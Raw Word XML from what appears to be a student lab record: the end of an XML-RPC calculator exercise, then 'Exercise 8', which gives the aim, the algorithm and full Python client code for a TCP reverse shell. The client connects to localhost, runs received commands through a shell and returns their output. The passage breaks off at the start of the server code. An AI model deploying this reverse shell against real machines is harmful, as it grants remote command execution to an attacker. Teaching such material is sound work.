    <w:p w14:paraId="5C80948D" w14:textId="481D59C6" w:rsidR="00DA5A41" w:rsidRDefault="00DA5A41" w:rsidP="00DA5A41">
      <w:r w:rsidRPr="00DA5A41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AB848F" w14:textId="407426D3" w:rsidR="00DA5A41" w:rsidRDefault="003C6BC6" w:rsidP="00DA5A41">
      <w:r w:rsidRPr="003C6BC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8D79B1" w14:textId="10533F3A" w:rsidR="003C6BC6" w:rsidRDefault="000E0095" w:rsidP="00DA5A41">
      <w:r w:rsidRPr="000E0095">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64AD3DCE" wp14:editId="06869049">
            <wp:extent cx="5731510" cy="1635125"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="126600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02614" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1635125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5A4D2E" w14:textId="77777777" w:rsidR="000E0095" w:rsidRDefault="000E0095" w:rsidP="00DA5A41"/>
    <w:p w14:paraId="64A485E2" w14:textId="4CEC59AB" w:rsidR="000E0095" w:rsidRDefault="000E0095" w:rsidP="00DA5A41">
      <w:r w:rsidRPr="000E0095">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4FBD78" w14:textId="77777777" w:rsidR="000E0095" w:rsidRDefault="000E0095" w:rsidP="00DA5A41"/>
    <w:p w14:paraId="1C34451A" w14:textId="24CE743B" w:rsidR="00A031E9" w:rsidRDefault="00A031E9" w:rsidP="00DA5A41">
      <w:r w:rsidRPr="00A031E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F4DB5CE" wp14:editId="784D6245">
            <wp:extent cx="5731510" cy="2151380"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="28591064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10641" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2151380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B41D0B7" w14:textId="77777777" w:rsidR="00A031E9" w:rsidRDefault="00A031E9" w:rsidP="00DA5A41"/>
    <w:p w14:paraId="1D8F19AA" w14:textId="77777777" w:rsidR="00A031E9" w:rsidRDefault="00A031E9" w:rsidP="00DA5A41"/>
    <w:p w14:paraId="4695DE48" w14:textId="50E2CFB7" w:rsidR="00A031E9" w:rsidRDefault="00A031E9" w:rsidP="00DA5A41">
      <w:r w:rsidRPr="00A031E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B88B03D" w14:textId="4D954646" w:rsidR="00A031E9" w:rsidRDefault="00400136" w:rsidP="00DA5A41">
      <w:r w:rsidRPr="00400136">
        <w:t xml:space="preserve">The XML-RPC calculator server successfully provided remote arithmetic functions. The client connected to the server and received correct results for addition, subtraction, multiplication, division, and </w:t>
      </w:r>
      <w:r>
        <w:t>modulo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621D2688" w14:textId="77777777" w:rsidR="00A90ECE" w:rsidRDefault="00A90ECE" w:rsidP="00DA5A41"/>
    <w:p w14:paraId="4CF56665" w14:textId="77777777" w:rsidR="00A90ECE" w:rsidRDefault="00A90ECE" w:rsidP="00DA5A41"/>
    <w:p w14:paraId="4ECE73A8" w14:textId="77777777" w:rsidR="00A90ECE" w:rsidRDefault="00A90ECE" w:rsidP="00DA5A41"/>
    <w:p w14:paraId="33C8025C" w14:textId="77777777" w:rsidR="00A90ECE" w:rsidRDefault="00A90ECE" w:rsidP="00DA5A41"/>
    <w:p w14:paraId="34B0C516" w14:textId="77777777" w:rsidR="00A90ECE" w:rsidRDefault="00A90ECE" w:rsidP="00DA5A41"/>
    <w:p w14:paraId="2EA1B3A0" w14:textId="77777777" w:rsidR="00A90ECE" w:rsidRDefault="00A90ECE" w:rsidP="00DA5A41"/>
    <w:p w14:paraId="768BAF3B" w14:textId="77777777" w:rsidR="00A90ECE" w:rsidRDefault="00A90ECE" w:rsidP="00DA5A41"/>
    <w:p w14:paraId="21516DE0" w14:textId="1EE148A3" w:rsidR="00B37A8C" w:rsidRDefault="00720FE5" w:rsidP="00720FE5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00720FE5">
        <w:lastRenderedPageBreak/>
        <w:t>DEVELOP A PROGRAM TO CREATE REVERSE SHELL USING TCP SOCKETS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5270BAA0" w14:textId="77777777" w:rsidR="00720FE5" w:rsidRDefault="00720FE5" w:rsidP="00720FE5"/>
    <w:p w14:paraId="2C2AFEB3" w14:textId="3328A1F3" w:rsidR="00720FE5" w:rsidRDefault="00770F8B" w:rsidP="00720FE5">
      <w:r>
        <w:t>Ex. No</w:t>
      </w:r>
      <w:r w:rsidR="00720FE5">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2231FC3C" w14:textId="77777777" w:rsidR="00720FE5" w:rsidRDefault="00720FE5" w:rsidP="00720FE5"/>
    <w:p w14:paraId="3AE9959C" w14:textId="4E947078" w:rsidR="007E4552" w:rsidRPr="007E4552" w:rsidRDefault="007E4552" w:rsidP="007E4552">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E4552">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1D65B4" w14:textId="77777777" w:rsidR="007E4552" w:rsidRDefault="007E4552" w:rsidP="007E4552">
      <w:r w:rsidRPr="007E4552">
        <w:t>A server and client that communicate over TCP: the server sends text commands; the client runs them and returns the output plus its current working directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65556086" w14:textId="77777777" w:rsidR="007E4552" w:rsidRPr="007E4552" w:rsidRDefault="007E4552" w:rsidP="007E4552"/>
    <w:p w14:paraId="38D370AD" w14:textId="1764E932" w:rsidR="007E4552" w:rsidRPr="007E4552" w:rsidRDefault="007E4552" w:rsidP="007E4552">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E4552">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22965EDD" w14:textId="77777777" w:rsidR="007E4552" w:rsidRDefault="007E4552" w:rsidP="007E4552">
      <w:r w:rsidRPr="007E4552">
        <w:t>Demonstrate basic TCP communication and remote command execution between two Python programs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28992561" w14:textId="77777777" w:rsidR="007E4552" w:rsidRPr="007E4552" w:rsidRDefault="007E4552" w:rsidP="007E4552"/>
    <w:p w14:paraId="7DC1F8BB" w14:textId="163BB463" w:rsidR="007E4552" w:rsidRPr="007E4552" w:rsidRDefault="007E4552" w:rsidP="007E4552">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E4552">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Algorithm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157023D5" w14:textId="77777777" w:rsidR="007E4552" w:rsidRPr="007E4552" w:rsidRDefault="007E4552" w:rsidP="007E4552">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E4552">
        <w:t>Server: listen on a port, accept a client, read commands from the user, send commands to client, print responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1B6CA3" w14:textId="77777777" w:rsidR="007E4552" w:rsidRPr="007E4552" w:rsidRDefault="007E4552" w:rsidP="007E4552">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E4552">
        <w:t>Client: connect to server, receive commands, if cd then change directory, otherwise run the command, send back output and current directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77501A7C" w14:textId="0F17D0E5" w:rsidR="00DE0065" w:rsidRDefault="007E4552" w:rsidP="00720FE5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E4552">
        <w:t>On quit close the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66490311" w14:textId="77777777" w:rsidR="007414E7" w:rsidRDefault="007414E7" w:rsidP="007414E7"/>
    <w:p w14:paraId="197F8649" w14:textId="1C599CA1" w:rsidR="007414E7" w:rsidRDefault="007414E7" w:rsidP="007414E7">
      <w:r w:rsidRPr="007414E7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129E7B11" w14:textId="1E2486FC" w:rsidR="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5023F417" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F"/>
    <w:p w14:paraId="64E3F3F8" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t>import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18136529" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t>import subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1C973C" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A6B113C" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t>host = '127.0.0.1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588117F7" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t>port = 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B213FA5" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>connect_to_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25937F2D" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    client = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>socket.socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>socket.AF_INET</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>socket.SOCK_STREAM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268299D8" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>client.connect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>((host, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F15E436" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">    while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E0F94F" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C911C2" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">            command = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>client.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>(1024).decode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BB12F3" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">            if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>command.lower</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>() == 'quit':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D2B518" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">                break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7A11C4" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>command.startswith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>('cd '):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050860F3" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">                try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7C0E77" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>os.chdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>(command[3:].strip())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B43A9F3" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">                    output = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>f"Changed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve"> directory to {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>os.getcwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>()}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDB8407" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">                except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2964D597" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">                    output = str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C62BB8E" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">            else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C1E4D2" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">                process = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>subprocess.Popen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">(command, shell=True, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>subprocess.PIPE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>, stderr=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>subprocess.PIPE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>, stdin=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>subprocess.PIPE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3374028A" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">                output = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>process.stdout.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">() + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>process.stderr.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04922F18" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">                output = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>output.decode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77255FB7" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>current_dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>os.getcwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>() + "&gt; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD5F1EE" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>client.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">((output + "\n" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>current_dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>).encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAF1A70" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">        except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419638F1" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>client.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>(str(e).encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1351F0" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">            break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E90C6AC" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>client.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE8D5C0" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225D314B" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>connect_to_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5E2F">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C38DE8A" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F"/>
    <w:p w14:paraId="5CBE3B3C" w14:textId="17703CB8" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5E2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>erver</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F3443E" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
      <w:r w:rsidRPr="006D5E2F">
        <w:lastRenderedPageBreak/>
        <w:t>import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778DB106" w14:textId="77777777" w:rsidR="006D5E2F" w:rsidRPr="006D5E2F" w:rsidRDefault="006D5E2F" w:rsidP="006D5E2F">
